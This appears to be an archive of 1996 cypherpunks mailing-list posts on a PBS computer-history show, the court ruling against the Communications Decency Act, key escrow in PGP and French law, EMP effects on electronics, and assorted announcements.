(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 14 Jun 1996 06:51:28 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: Insults (was: PBS show)
In-Reply-To: <199606130747.AAA26956@netcom7.netcom.com>
Message-ID: <Pine.SUN.3.91.960613110936.2157D-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jun 1996, Bill Frantz wrote:

> At 10:26 PM 6/12/96 -0700, Timothy C. May wrote:
> >I personally despise the term "nerd," but I won't get into that here.
> >(Except to say that "nerds," "geeks," and "dweebs" are terms of insult, and

> IMHO the best way to deal with an insult is to make it a badge of pride. 

Geek Pride! Yes! Time to start Hacked-Up!

"We're Freaks! We're Geeks! We've got RSA, Get Used To It"

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brad Shantz" <bshantz@nwlink.com>
Date: Fri, 14 Jun 1996 10:41:57 +0800
To: cypherpunks@toad.com
Subject: Re: PBS show
Message-ID: <199606131824.LAA18841@montana.nwlink.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May Wrote:

> I personally despise the term "nerd," but I won't get into that here.
> (Except to say that "nerds," "geeks," and "dweebs" are terms of insult, and
> anyone who accepts this labelling by the media and by "jerks" (a comparable
> term, by the way) is proably just a dweeb anyone, so I guess the term is
> accurate.)

I just caught this show last night.  And enjoyed it.  I 
personally thought that Steve Jobs quoting Picasso with the "True 
artists steal" line in regards to copying others work for personal 
gain was interesting. 

Since I live 10 blocks away from the main MS Campus, I hear 
everything there is to hear about Bill Gates.  So, it was really 
unnecessary for me to watch the hour and a hlaf devoted strictly to 
who Bill stole what from.  **GRIN**
 
> Those were exciting times. But, having worked at Intel during those heady
> days, and being pretty active these days on the Net, I'd have to say the
> Web, Net, Java, etc. are *just as exciting* (if not more so) than those
> days. So, the best years are probably yet to come.

Having started my "prefessional" Internet career at SPRY in 1993, I 
agree that the best of the Internet is yet to come.  Bill Gates said 
in the show last night that it is almost impossible to judge where 
the market will be in a year because things are changing so fast.  
Right now everything is a buzzword.  JAVA, etc...they are all infant 
technologies that if marketed correctly could lead to the next 
revolution.

> (BTW, I also had an ARPANET account in 1973, when there were only several
> sites as nodes.)

I was 2 until August of 1973.   **GRIN**  I didn't even know that the 
pictures on the TV weren't real yet.

> So, a pretty fair history of the industry. Probably the best such show I've
> seen.

I do wish they'd picked a better title though.

Brad


 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Fri, 14 Jun 1996 01:59:32 +0800
To: cypherpunks@toad.com
Subject: NYT on CDA Win
Message-ID: <199606131127.LAA25041@pipe2.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   6-13-96. NYP, Page One lead: 
 
   "Judges Turn Back Law To Regulate Internet Decency." 
 
      In a unanimous decision that celebrated the Internet as 
      "the most participatory marketplace of mass speech that 
      this country -- and indeed the world -- has yet seen," 
      a three-judge Federal panel in Philadelphia yesterday 
      declared unconstitutional major parts of a new law 
      intended to regulate indecent material on the global 
      computer network and blocked the law's enforcement. 
 
      The three judges called Government attempts to regulate 
      content on the Internet a "profoundly repugnant" affront 
      to the First Amendment's guarantee of free speech. 
 
      "Just as the strength of the Internet is chaos, so the 
      strength of our liberty depends upon the chaos and 
      cacophony of the unfettered speech the First Amendment 
      protects," Judge Dalzell wrote. 
 
   http://pwp.usa.pipeline.com/~jya/cdawin.txt   (3 articles) 
 
----- 
 
Or, if the http fails, send a CDA_win to <jya@pipeline.com>. 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 14 Jun 1996 10:39:37 +0800
To: cypherpunks@toad.com
Subject: Re: PBS show
Message-ID: <199606131831.LAA29180@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:31 AM 6/13/96 -0700, Timothy C. May wrote:

>
>Compared to my SOL, the Apple II would've been more useful, in retrospect.
>As to the 40-character display, that was the norm in those days. (My SOL,
>and certainly the other machines available to home users at that time, had
>only a 40-character-wide display...when in worked.)
>
>The comments about the floppies (" VERY SMALL capacity floppies (which were
>very slow as well") is even more off-base.

The original Apple II floppy held ONLY 90 kilobytes on a 5" floppy.  How did 
they do such a bad job?

>>BTW, Intel shares a substantial proportion of the blame for Apple's choice
>>of the 6502.  The decision was made, I've heard, because Intel was still
>>trying to get $200 for a slow 8080, while Western Design Center (?) wanted
>>only about $20 for a 6502.
>
>You need to check your claims more carefully. There are always many reasons
>a chip is selected for a design.

Yes, there are, but a 10-to-1 difference in price is a killer for most designs.

>
>>And by refusing to build Masatoshi (?) Shima's design for the Z-80, they
>>totally lost the race for the 8-bit PC world.  The Z-80 turned into the
>>highest-volume 8-bit microprocessor by far, leaving both the 8080 and the
>>8085 in the dust, and even the 6502.
>
>Again, your understanding of the history of Intel, Zilog, and the industry
>in general is lacking.
>
>The design and process technology resources were instead committed to the
>8086, 

The design for the Z-80 was completed and in Intel's hands.  Intel didn't 
want to build the Z-80, they wanted to focus on peripheral chips, so they 
let Shima go and start Zilog.


and history is rather clear about the wisdom of doing that. Intel is
>now capitalized at something like $50-70 billion, and Zilog is no longer on
>the radar screen.

No!  The 8086 wasn't "wise," it was a crock. (The _principle_ of building a 
16-bit microprocessor was just fine, and in fact necessary.  It's their 
product that sucked.)   Brain-dead segmented architecture, 64k per segment 
limitation, 1-megabyte memory limitation.  The only thing that made it 
appear like a wise move (and even then, only in hindsight) was the fact that 
IBM was even more idiotic, and selected it (actually, worse, the 8088!) for 
their PC.  Even a bad standard can be hugely profitable, and that is what 
kept Intel alive.

Furthermore, the only way Intel got the 8086 off the ground was to buy off 
AMD to support the 8086, as opposed to the Z-8000 as they had done in a long 
series of anti-8086 ads in about 1978 or so.  (you do recall the series, 
don't you?  You know, the two guys on the soapboxes?)  They later stiffed 
AMD by refusing to deliver the design for the 386, and they got raked over 
the coals for that a few years ago in court.  Pure fraud.  Intel's 
misbehavior has probably kept the price of the leading-edge generation 
microprocessor at least a factor of 3 higher than it would have been had AMD 
been allowed to compete according to their 1978 agreement.  Much of the 
capitalization you speak of, therefore, was the product of this fraud.

The world would have been far better off if they'd chosen the 68000 for the 
IBM PC.  I suspect the reason IBM didn't was that they thought it would be 
easier to push around tiny Intel rather than the electronics giant Motorola. 
 They were probably right about this limited interpretation, but in exchange 
for a little temporary control they doomed the world to a built-in series of 
design crocks that only began with the innate limitations of the 8088. 
 
Every product for the PC you buy today is more expensive, less reliable, 
harder to install, less compatible, more complicated for less benefit, has 
less competition, and is in general less desirable because of the mistakes 
Intel made in the middle 1970's, and IBM made in 1980 or so.  These mistakes 
weren't repaired in subsequent incarnations of the 286, 386 and others, or 
IBM's AT, etc, because they were _architecture_ problems and software-design 
problems that cannot be "repaired."  

Why is it that you can afford 32 megabytes of DRAM, yet you'd get 
insufficient-memory errors if you're not careful with you CONFIG.SYS and 
AUTOEXEC.BAT?  (Combination of Intel's dumb mistake of a 1-meg memory 
limitation, and IBM's filling of 1/3 of that space with crap.)  Why is it 
that you can't put two color displays on the latest PC's? (IBM's dumb 
mistake:  Memory-mapped video that can't be re-addressed.) Why can't you put 
a dozen peripheral devices into a PC, and you have trouble with even 3-4, 
and are forced to look up all the DMA's, Interrupts, and COM ports to ensure 
no overlap?  (IBM's dumb mistake.)

I could go on, but what's the point?  The PC architecture is pure crap, and 
I'm saying that as a person who uses them daily, and will not own a Mac 
because of Apple's legal misbehavior.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 13 Jun 1996 23:51:57 +0800
To: cypherpunks@toad.com
Subject: New NRC Report Site
Message-ID: <199606131135.LAA25300@pipe2.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to Replay Web Development's generosity, the full 434-page NRC
cryptography report of May 30, 1996 is available at: 
 
 
     http://www.replay.com/mirror/nrc/ 
 
 
Our previous URL for the report also links to Replay's site: 
 
 
     http://pwp.usa.pipeline.com/~jya/nrcindex.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Fri, 14 Jun 1996 07:31:41 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: Anonymous remailers mentioned in CDA decision
In-Reply-To: <EljtUzK00YUyR7NsIY@andrew.cmu.edu>
Message-ID: <Pine.SUN.3.93.960613114908.23962A-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Given the extraordinaryly good findings of facts, the government will have
a very very tough time on appeal.  Shows you what fine lawyering can do.


On Thu, 13 Jun 1996, Declan B. McCullagh wrote:

> Excerpts from internet.cypherpunks: 12-Jun-96 Re: Anonymous remailers
> men.. by Dr.Dimitri V. KOTM@bwalk 
> > This statute's language pretty much forces DOJ to appeal, even if they think
> > the law sucks.
> 
> What, precisely, in the statute's language *forces* the DoJ to appeal?
> 
> It is the Solicitor General's decision. At close of business today, the
> DoJ still hadn't told me whether they would or not. But we expect they
> will.
> 
> -Declan
> 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <root@edmweb.com>
Date: Fri, 14 Jun 1996 10:16:52 +0800
To: edgar@Garg.Campbell.CA.US
Subject: Zimmerman/Viacrypt
Message-ID: <Pine.BSF.3.91.960613112925.179A-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> Phil disagrees with ViaCrypts new "business" version of PGP which
> apparently encrypts all messages with an employer-supplied public key
> in addition to any specified by the employee.

Looking at Denning's critique (pro-escrow rant) of the NCR crypto report, 
she mentioned that mutant version:

[http://www.cosc.georgetown.edu/~denning/crypto/NRC.txt]
  "Other corporations are similarly adopting products with data recovery 
  capabilities as they integrate encryption into their systems (even PGP 
  comes with data recovery in Viacrypt's Business Edition)."

IMHO Phil Zimmerman has good reason to object to the mutant version, if
it's going to cause the PGP name to somehow endorse escrow. 

If there really is a demand for escrow, maybe cypherpunks could create a
One Time Pad escrow service. Different custom 'keys' could be produced,
depending on who's asking for the data... <G>

=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 |
|          -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. --          |
===================================================================:)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 14 Jun 1996 11:05:05 +0800
To: cypherpunks@toad.com
Subject: Re: PBS show
Message-ID: <ade5b5c2000210044195@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:30 PM 6/13/96, jim bell wrote:
>At 10:31 AM 6/13/96 -0700, Timothy C. May wrote:
...
>>The comments about the floppies (" VERY SMALL capacity floppies (which were
>>very slow as well") is even more off-base.
>
>The original Apple II floppy held ONLY 90 kilobytes on a 5" floppy.  How did
>they do such a bad job?

And the cost of these floppies was very low--I seem to recall $150 or $175.
In those days, when 8" externals weighed 50-70 pounds and cost a few
thousand dollars, this was a notable achievement.

Remember, the standards of 1978 are not the standards of today. The
"standard" then, for personal computers that were affordable, was an
external cassette recorder ("TARBELL" standard). Go back and look at issues
of "Byte" or "Interface Age" or "Dr. Dobbs" to see what was really
available.

Given the low cost of the Apple unit, it's a marvel they could do it at
all. The "IWM" was the key. Just plain good design. And "only 90 KB" is
also misleading in implying Apple was behind the times. The IBM PC launched
3 years later had a built-in cassette port and only offered 180K diskette
drives (later upgraded to 360K).

Really, blasting Apple for poor design and for not providing
higher-capacity floppies, when the competition was doing far worse, is
laughable.

>The design for the Z-80 was completed and in Intel's hands.  Intel didn't
>want to build the Z-80, they wanted to focus on peripheral chips, so they
>let Shima go and start Zilog.

Your history is flawed. Faggin and Shima did not have a completed Z-80
design when they left; if they did, Intel would hardly have let them take
it with them when they left! As the Gen Xers would say, "Duh."

Read up on some of the histories of the time. Intel never chose to focus on
"peripherals," they chose to build both. (If anything, EPROMs were the
profit center in the mid- to late-70s, not either processors or
peripherals.)

At the time you are apparently referring to, the mid-70s, Intel had a huge
effort started to develop the "8800." While this was ultimately a failure,
it is supremely stupid to use 20-20 hindsight without looking at more
issues. All development efforts and companies involve lots of decisions,
lots of tradeoffs, lots of hurt feelings, and lots of apparent mistakes.
Arguing that Apple could have introduced a high-capacity floppy in 1978, or
that Intel should have developed the Z-8000, is just plain pointless
nonsense. We could all speculate about how some company should have done
things differently, knowing what we know now.

The rest of Bell's points are just typical PC-microprocessor flame material.

Use what you want to use, just don't rewrite history to fit your theories.

I won't comment further on this thread.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jt@freenix.fr (Jerome Thorel)
Date: Thu, 13 Jun 1996 22:41:00 +0800
To: thorel@netpress.fr
Subject: lambda bulletin 2.08 / French Telco Act puts the Internet in leash
Message-ID: <v01540b04ade5ac43a3f3@[194.51.213.140]>
MIME-Version: 1.0
Content-Type: text/plain


netizen's --> Lambda Bulletin 2.08 <-- contents

French Telco Act puts the Internet in leash
+ New rules regulating Internet content
+ First key-escrow encryption rules


As the Communications Decency Act was declared unconstitutional yesterday, June 12, the French Parliament (Senate and Assembly) passed a kind of Telco Act a la francaise last week, June 7. This law, aimed at providing new regulations for the telecommunications market (including the end of telephone monopoly in 1998), stresses two interesting points for Internet users : 1) a kind of CDA amendement was introduced en force in the Senate on Wednesday, June 5, just two days before it was voted Friday, at 3 in the morning. 2) the law establishes the first ever key escrow encryption rules created in industrialised countries. It will create trusted third parties (TTPs), private companies taht would keep encryption keys in custody for law enforcement purposes. It turns out that before the vote of the law, French military circles had already choosen which firms would be well suited to be TTP : Alcatel, Sagem and Bertin. All of them are well connected to the French military complex, and !
are all big defense contractors.

The amendment number 200 in the Loi sur la Reglementation des Telecommunications (LRT) was sponsored by French Senator Larcher and introduced by French telmecom minister Francois Fillon. At first glance, it depenalizes Internet Access Providers for the content of text, images and documents that they are transmitted. But there is an IF. The condition stresses on that they must conform to future recommendations that will be establish by a French government's council : the Comite Superieur de la Telematique. Created in February 1993, the CST has a mission of regulation of Minitel services (text and voice based services), through a professional code of ethics. The CST will no longer depends upon the French telecom ministry, but will be placed under the tutelage of another famous regulation watchdog : the CSA (A for audiovisuel - a kind of French FCC), aimed at regulating radio and TV broadcasts.

The law makes clear that if IAPs don't respond to "black" lists of Internet sites or newsgroups (in case where these sites may be in opposition to French law), the IAP will be held responsible for what it is carrying. These lists will be set up by the CST. Internet organisations and professionnals are scheduled to be members of the new CST -- today, in its "Minitel" form, it has 20 members, magistrates, ministry officials, France Telecom reprsentatives, Minitel providers, family and consumer organisations...  

So, the French amendment smells like the CDA, with the introduction of a so-called reprentative body. In the U.S. the IAP or ISP must control its content. In France this is a centralised body that will do the job. It feels that the French succeeded in what some in the US dreamt : to give the FCC the power to rate sites or content on the Internet. The French State, once again, plays the Big Mother (mother = the Republic) game with a huge sense of precipitation. 

Furthermore, the law broke in great haste -- and mess. Because before the amendment 200, telecom minister Fillon established an interministerial commission to work on guidlines and recommendations to enforce French law on the Internet. It came after a Jewish organisation sued IAPs for transmitting neo-nazi propaganda; and early in May, when 2 IAP directors were arrested for one day, and convicted, for transmission of pedophile pictures. 

The mess comes about because that Fillon didn't wait for the Commission : it was scheduled to publish a report on its work around June 15. Another mess concerns French pro-users organizations. The newly created French Chapter of the Internet Society (ISOC-France) decided, apparently with the government commission's consent, to organize a mailing list consultation on the issue. Another group, the AUI (Association of Internet users), published a report this week about ethics, Internet content selection, and so on. Both organizations were openly ignored by Fillon. He did this even after saying during various interviews that the problem of IAP legal responsability on the Internet will be the result of a "broad consensus".

It turns out, however, that a small pressure group of IAPs (the AFPI) were consulted Monday, June 2, and had the opportunity to read the amendment before its final review in the Senate. The IAPs are quite satisfied now, because they didn't want to be treated as "pedophiles" and "neo-nazi" anymore. But they will have to adopt the CST guidelines.

During my personnal inquiry of the CST last year, I found some clues to understanding how the CST has been working at regulating Minitel services. The CST has a surveillance assignment on the Minitel market (to ensure that each provider follows deontology principles written in his contract with France Télécom). But surveillance operations are not organized by the CST, but by a small army of France Telecom spook agents in Bordeaux: they are 5 to 8 people regulating hundreds of thousands of services! It is no surprise to learn that France Telecom regularly intervenes in this choice, and that France Telecom itself is a big Minitel provider, through a lot of business affiliates. It turns out that theses spook agents are infiltrating private discussions in adult-oriented forums to check for indecent speech (which may be sanctionned by the CST). Here is what here in France we have inherited to regulate the Internet!

The second important point of this Telco Act concerns encryption. France was already the first country in the OECD to forbid an individual to use any crypto system not approved by the French authorities (ie, the military). Thus, PGP-like software were, de facto, forbidden. The new law introduces the first key-escrow regulation. It frees cryptography use ONLY for digital signature; but to ensure privacy of email messages, however, the liberation of use is under condition : to give encryption keys to a so-called TTP. Some confidential reports in the press said that one or three private companies are already on the list to serve as TTPs for the French government. The first is Bertin & Co., an engineering company that has some competence in cryptography, and the others seem to be Alcatel-Alsthom (a big industrial conglomerate in telecommunications, defense and public-works engineering), and Sagem, another telecom conglomerate. It seems clear that all of these companies were choose!
n according to their defense expertise and good relations with the French military. The mess is that these choices, if confirmed, have been made before the vote on the law, and even before "applications decrees" were published (they may be prepared this summer).
 
France has no NSA. But some big ideas. (During the oil crisis in the 70's, a government commercial stated : "In France we have no oil. But we have good ideas".)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wxfield@shore.net (Warren)
Date: Fri, 14 Jun 1996 11:18:47 +0800
To: cypherpunks@toad.com
Subject: Re: PBS show
Message-ID: <v02140701ade5dbad4bc8@[204.167.110.223]>
MIME-Version: 1.0
Content-Type: text/plain


I enjoyed the show as well...I was a bit young when the Altair was first
published in Radio Elec., but that didn't stop me from trying to build one.
I recall spending 100's of hours piecing it all together - it all made
sense when I 'wrote' 3 hours of code to add a stack of numbers together.

It was (and still is) and addictive feeling to think (back then) "Wow, I
just did the same thing they were doing with Eniac in my bedroom!"

Now then, if we can only get Hollywood to accurately portray computers in
films...there's a hack. ;)

BTW-If you are still 'caught up' in the innovative 'demo or die' theme the
show portrays check out the following site (http://www.be.com/) - I'm sure
many of you have already been there? Are there any "Be" developers here?
What are your thoughts?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: newslett@compcurr.com
Date: Sat, 15 Jun 1996 11:34:08 +0800
To: maillist@mail.compcurr.com
Subject: Inside Currents
Message-ID: <2.2.32.19960613194159.006b5610@mail.compcurr.com>
MIME-Version: 1.0
Content-Type: text/plain




Inside Currents
Vol 1, No. 4
June 13, 1996

CONTENTS:

*Computer Encyclopedia & Computer Accessories, now two of your favorite 
 destinations
*CCI Members Talent Bank
*CCI show schedule
*Used/refurbished equipment
*Take our ISP survey and win a 28.8 modem.  
*Tons of free software available on CCI
*Small business resources
*Chat and forums coming soon!
*We list resources for nine major metro areas
*We need more user group listings...and articles, too.

++++++++++++++++++++++++++++++++++++++++++++++++++++



Computer Encyclopedia & Computer Accessories are the fastest growing 
destinations on CCI.  If you haven't checked 'em out yet, see why others 
flock there. You can download a free WebPhone and browse the Computer 
Encyclopedia at 
http://www.currents.net/market/accessories/accessories.html 


Check out the Members' Gallery and follow the path to creating your own
space on the web -- free.  Also create an on-line Resume and be a part of
the CCI Members' Talent Bank.  Both pages are freely accessible by other 
CCI Members and the outside world alike (follow the instructions when creating
your page(s) to obtain your personal URL). 

 http://www.currents.net/general/member/pages/gallery.html
 http://www.currents.net/general/member/resume/talent.html


1996 show schedule for CCI.  Stop by our booth and let us know 
how we're doing:

 *Online Expo, Concourse Expo Center, San Francisco, July 11-13
 *Web.X at PC Expo, Javits Center, NY, June 18-20
 *Online Expo, NY Coliseum, Sept 5-7
 *Internet Expo, Hynes Convention Center, Boston, Oct 16-17
 *Online Expo, LA Convention Center, Oct 24-26
 *Comdex, Las Vegas, Nov 18-22
 *Internet World, Javits Center, Dec 11-13



Used or refurbished equipment could be the way to go, especially 
considering how fast the technology changes.  Look for a new 
used/refurbished equipment buying service here in a few weeks.



Ten people will be selected at random from those who complete the ISP 
survey to win the top-rated DeskPorte 28.8S external modem from Microcom. 
Plus, you'll get the warm fuzzies knowing you helped us inform others 
about who's performing up to snuff, and who isn't. 

http://www.currents.net/ispsurvey.html 



Our Download area is growing by leaps and bounds with tons of  Mac and PC 
shareware and freeware. Check it out at 

http://www.currents.net/resources/download.html 
 


Small business owners and start-ups should look at our Small Business 
Resources area for help in everything from funding to management recruitment.
Why reinvent the wheel when their is so much info at your disposal? Small 
Business Resources are at
 
http://www.currents.net/resources/smbus.html 


Stay tuned--chat and forums coming soon! 
We're planning on establishing forums based on, but not limited to,
Technical Support such as: 

    Internet Help
    Windows 95
    Windows NT
    Macintosh


You've read the cover story, now go to Regions to discover what's going on
in major metro regions around the country [such as]: Northern California, 
Southern California, Chicago, Dallas, Houston, Austin, Atlanta, Boston & 
New York at 

http://www.currents.net/magazine/regional/regional.html


Belong to a user group that's not listed in our User Group area?  Have 
your User Group SYSOP list your group with us online at 

http://www.currents.net/community/userg.html 



We're looking for more (free) professionally-written editorial in almost 
every category and application of personal and business computing that we 
can add to our web site.  If you're interested, contact: Mike McDonnell 
at mmc@compcurr.com



Feedback, feedback, feedback.  Please tell us how we're doing, and what 
you'd like to see on our site in the future. 

http://www.currents.net/general/feedbac.html 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Fri, 14 Jun 1996 08:38:08 +0800
To: cypherpunks@toad.com
Subject: Re: PBS show
Message-ID: <9606131649.AA28172@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 10:26 PM 6/12/96 -0700, Timothy C. May wrote:
>I caught the show and thought it was pretty good, all in all.

        I thought so too? When is part II coming on? (I hope it didn't come
right after that, I had to run.) Next week?

>I personally despise the term "nerd," but I won't get into that here.

        Ahhh... it makes them happy. What I find most unnapealing is the
unabashed, "I don't have a life, I live with a computer" mentality. I was
rather taken with that mentality myself for a bit (and I'm sure it
contributed to the RSI), but even then I would have found it painfully
difficult to only associate with one "culture" and only do one thing all day
long. Maybe "nerds" over do it, but they do do other things, like play
magic, or assasin, D&D, or whatever. <grin> And the most
interesting/brilliant computer people that I run into _have_ other interests
beyond computers.

>first employee hired by Jobs and Woz. Personally, my first personal
>computer was a Processor Technology SOL, as I thought the Apple II looked
>too much like a toy. Shows you what I knew.)

        The thing that startled me, was the contrary temporal perspective.
Watching it I felt like, "Hey! I remeber that, I used an Apple II in
kindergarden to write LOGO," or though I didn't have an Altair, I had a
Bailey Arcade. No one here probably remembers, but it was a kick ass game
playing (the best at the time) and programmable machine. I remember
belonging to a mailing-list club and getting a thick envolope of type
written code that I'd dutifully punch into a calculator like entry pad. (All
~20 keys for quadrupely overloaded!!) The cool thing was it had cool (c-64
like) peeks and pokes and you could call a plethora of the pregenerated
graphical things from your own code. Then there was always saving it to the
audio tape... <ack> Ok, so that is the nostalgia bit (hey I remember that),
the other bit was a, wow that was a long time ago. Looking at PC-history
always feels like a contradiction in time.

_______________________
Regards,            Laziness is no more than the habit of resting before you
                    get tired. -Jules Renard
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Fri, 14 Jun 1996 11:32:33 +0800
To: cypherpunks@toad.com
Subject: Class III InfoWar: TST Article
Message-ID: <ade632bf01021004d335@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


There are two things that they may be speaking of:
1. Causing transient errors to crash the system and cause restarts that may
take many minutes.
2. Actually damage the machines.

I imagine that only a small fraction of the energy required to damage the
hardware is necessary to introduce serious transient errors. IBM used to
test the main frames as they installed them. They had to resist several
inch sparks drawn between the machine and a one meter frame. Software
diagnostics ran during the test. I think that few desk top machines would
survive that.

EMP (Electro Magnetic Impulse), a side effect of nuclear devices, is
purportedly able to damage electronics over distances of many miles. Some
weapons may be designed to enhance this.

Ordinary high explosives can produce a scaled down result. EMP is strategic
only because it  damages electronics that are too far enough to be damaged
by the blast. I suspect that high explosive EMPs are similar in this
regard.

The physics behind this is not abstruse. A significant part of the
explosive energy can be turned into EMP whether the source is nuclear or
chemical. How well it can be directed is probably highly classified. The
"antenna" is vaporized in either case and dissipates much of the energy.
The energy comes out in 10's of microseconds for high explosives and
fractions of a microsecond for nuclear. I don't know how much it takes to
fry an IC but judging from the wrist straps that are recommended for
installing ICs I would guess that it is a fraction of a Joule. (I once
discovered that a one Joule jolt really hurt.)

Faraday cages attenuate EMP by the same factor that they attenuate secrets.
I think that if a blast doesn't damage the cage then neither will the EMP.
Of course the cage may survive but fail to protect the interior
(insufficient attenuation). I don't know whether a cage sufficient for
tempest is sufficient for EMP protection. Comm lines and power cables go
thru the cage and cause problems here as well. Perhaps hefty surge
protectors suffice here. Communications equipment outside the cage should
at least be equipped to recover quickly upon transient error and not tear
donw circuits. Normal error control can then hopefully compensate for the
transient.  (IP, ATM, Frame relay??)

A large capacitor can discharge a lot of power in a short time without
causing nearly so much commotion as an explosion. Discharging a one kg
25000 volt capacitor makes a lot of noise, however. I don't know how well
it can be muffled.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 14 Jun 1996 13:54:54 +0800
To: cypherpunks@toad.com
Subject: microcurrency implementation
Message-ID: <199606132044.NAA05426@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



an interesting system that lets people bill for web pages
using telephone 800 number technology.


------- Forwarded Message

Date: Tue, 11 Jun 1996 15:19:37 -0300
From: Rick McGinnis <rick@dragon.mediadial.com>
Message-Id: <199606111819.PAA07849@dragon.mediadial.com>

Via-Web Access now perfected!

Instantly bill people over the web through long distance numbers.

	1. Paid in US funds for all 90+ countries using the net!
	2. Payouts are weekly!
	3. Receive $0.25 US for every minute.
	4. Easier than any web billing procedure currently used.
	5. Everyone has a phone.

If you would like to try Via-Web Access, please call...
	Can and US Dial 011-592-583-423
	Other Countries ++592-583-423

The Via-Web Access home page can be found at:
  http://stsim.com/mdc/viaweb/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 13 Jun 1996 23:50:33 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199606131156.NAA29657@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


_The Atlanta Journal/The Atlanta Constitution_  6/13/96

...From a 1/2 page article:

     *In Georgia the movement appears to be percolating, too. Robert Costner, president of Electronic Freedom Georgia, says the biggest hurdle his group is trying to clear is the unfamiliarity of legislators with the Internet.
     Laws like the CDA are passed, Costner said, "because people are afraid of the Internet just as people were at one time afraid of the printing press.*






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jseiger@cdt.org (Jonah Seiger)
Date: Fri, 14 Jun 1996 09:55:02 +0800
To: cypherpunks@toad.com
Subject: President Clinton's Statement on the CDA Decision
Message-ID: <v02140b0bade606eb2584@[204.157.127.4]>
MIME-Version: 1.0
Content-Type: text/plain



What's more interesting is what it doesn't say. He is not at all definitive
on whether the gvt will file an appeal...

Jonah

--
                             THE WHITE HOUSE

                      Office of the Press Secretary
___________________________________________________________________________

For Immediate Release                                       June 12, 1996

                         STATEMENT BY THE PRESIDENT

The Justice Department is reviewing today's three judge panel court
decision on the Communications Decency Act.  The opinion just came down
today, and the statute says we have twenty days to make an appeal.

I remain convinced, as I was when I signed the bill, that our Constitution
allows us to help parents by enforcing this Act to prevent children from
being exposed to objectionable material transmitted though computer
networks.  I will continue to do everything I can in my Administration to
give families every available tool to protect their children from these
materials. For example, we vigorously support the development and
widespread availability of products that allow both parents and schools to
block objectionable materials from reaching computers that children use.
And we also support the industry's accelerating efforts to rate Internet
sites so that they are compatible with these blocking techniques.

                                     -30-30-30-

* PROTECT THE INTERNET AND THE FUTURE OF FREE SPEECH IN THE INFORMATION AGE *
      Join the legal challenge against the Communications Decency Act!
               For More Information, Visit the CIEC Web Page
                         http://www.cdt.org/ciec/
                       or email <ciec-info@cdt.org>

--
Jonah Seiger, Policy Analyst           Center for Democracy and Technology
<jseiger@cdt.org>                           1634 Eye Street NW, Suite 1100
                                                      Washington, DC 20006
